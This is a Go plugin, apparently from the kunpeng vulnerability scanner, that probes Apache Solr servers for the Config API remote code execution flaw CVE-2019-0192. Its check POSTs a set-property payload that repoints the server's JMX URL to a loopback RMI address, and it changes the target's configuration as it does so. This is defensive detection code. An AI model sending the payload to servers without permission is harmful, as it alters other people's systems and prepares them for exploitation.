package goplugin
import (
"encoding/json"
"net/http"
"strings"
"github.com/opensec-cn/kunpeng/plugin"
"github.com/opensec-cn/kunpeng/util"
)
// apacheSolrRCE is the scanner plugin for the Apache Solr Config API remote
// code execution issue that Init describes (CVE-2019-0192).
type apacheSolrRCE struct {
	// info holds the plugin metadata assigned by Init.
	info plugin.Plugin
	// result accumulates the findings appended by Check until GetResult
	// hands them out and resets the slice.
	result []plugin.Plugin
}
// init registers this plugin with the plugin package under the "solr" key
// when the package is loaded.
func init() {
	scanner := &apacheSolrRCE{}
	plugin.Regist("solr", scanner)
}
// Init builds the plugin's descriptive metadata, stores it on the receiver
// and returns it.
//
// English gloss of the runtime strings, which are kept verbatim below:
// Name is "Apache Solr ConfigAPI remote code execution"; Remarks says that
// the ConfigAPI allows Solr's JMX server to be configured through an HTTP
// POST request, and that pointing it at a malicious RMI server lets an
// attacker use Solr's insecure deserialization to trigger remote code
// execution on the Solr side.
func (d *apacheSolrRCE) Init() plugin.Plugin {
	refs := plugin.References{
		URL:  "https://www.seebug.org/vuldb/ssvid-97850",
		CVE:  "CVE-2019-0192",
		KPID: "KP-0080",
	}

	// NOTE(review): the meaning of Level 0 is defined by the plugin package
	// and is not visible here; confirm it matches the intended severity.
	meta := plugin.Plugin{
		Name:       "Apache Solr ConfigAPI 远程代码执行",
		Remarks:    "ConfigAPI允许通过HTTP POST请求配置Solr的JMX服务器。 通过将其指向恶意RMI服务器,攻击者可以利用Solr的不安全反序列化来触发Solr端的远程代码执行。",
		Level:      0,
		Type:       "RCE",
		Author:     "wolf",
		References: refs,
	}

	d.info = meta
	return d.info
}
// GetResult returns the findings collected so far and resets the receiver's
// result slice to an empty, non-nil slice, so each finding is handed out once.
func (d *apacheSolrRCE) GetResult() []plugin.Plugin {
	collected := d.result
	d.result = []plugin.Plugin{}
	return collected
}
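// Check probes the Solr instance at URL for the Config API issue described by
// this plugin (CVE-2019-0192) and reports whether the target looks affected.
//
// It first lists the cores through /solr/admin/cores?wt=json and takes one
// core name from the "status" object. Go map iteration order is unspecified,
// so which core is used is arbitrary. It then POSTs a set-property command
// for jmx.serviceUrl to that core's /config endpoint. The target is reported
// only when the raw response contains the bracketed RMI address from the
// probe body. On a hit, a copy of d.info carrying the raw request and
// response is appended to d.result.
//
// The RMI address in the probe is the target's own loopback
// (127.0.0.1:56411), so the check does not depend on any external listener.
//
// NOTE(review): the second request is a state-changing POST against the
// target's configuration, not a read-only probe. Confirm whether the
// property persists on the target after the scan and whether the check
// should restore it.
//
// Any request, decode or response-shape error returns false. meta is not
// used by this check.
func (d *apacheSolrRCE) Check(URL string, meta plugin.TaskMeta) bool {
	poc := `{"set-property":{"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://127.0.0.1:56411/vultest"}}`

	request, err := http.NewRequest("GET", URL+"/solr/admin/cores?wt=json", nil)
	if err != nil {
		return false
	}
	resp, err := util.RequestDo(request, false)
	if err != nil {
		return false
	}

	var core map[string]interface{}
	if err = json.Unmarshal(resp.Body, &core); err != nil {
		return false
	}

	// The body comes from the scanned host, so its shape is not trusted. A
	// missing, null or non-object "status" ends the check here; the previous
	// unchecked type assertion panicked on such a response.
	status, ok := core["status"].(map[string]interface{})
	if !ok {
		return false
	}

	var configURL string
	for k := range status {
		configURL = "/solr/" + k + "/config"
		break
	}
	if len(configURL) == 0 {
		// No cores listed, so there is no config endpoint to probe.
		return false
	}

	request, err = http.NewRequest("POST", URL+configURL, strings.NewReader(poc))
	if err != nil {
		return false
	}
	// Presumably the true flag asks util.RequestDo to capture the raw
	// request and response that are read below; confirm in util.
	resp, err = util.RequestDo(request, true)
	if err != nil {
		return false
	}

	// Presumably the address is echoed back in an error message when the
	// server tries to use the configured JMX URL; confirm against a known
	// vulnerable and a patched instance.
	if !strings.Contains(resp.ResponseRaw, "[rmi://127.0.0.1:56411/vultest]") {
		return false
	}

	result := d.info
	result.Response = resp.ResponseRaw
	result.Request = resp.RequestRaw
	d.result = append(d.result, result)
	return true
}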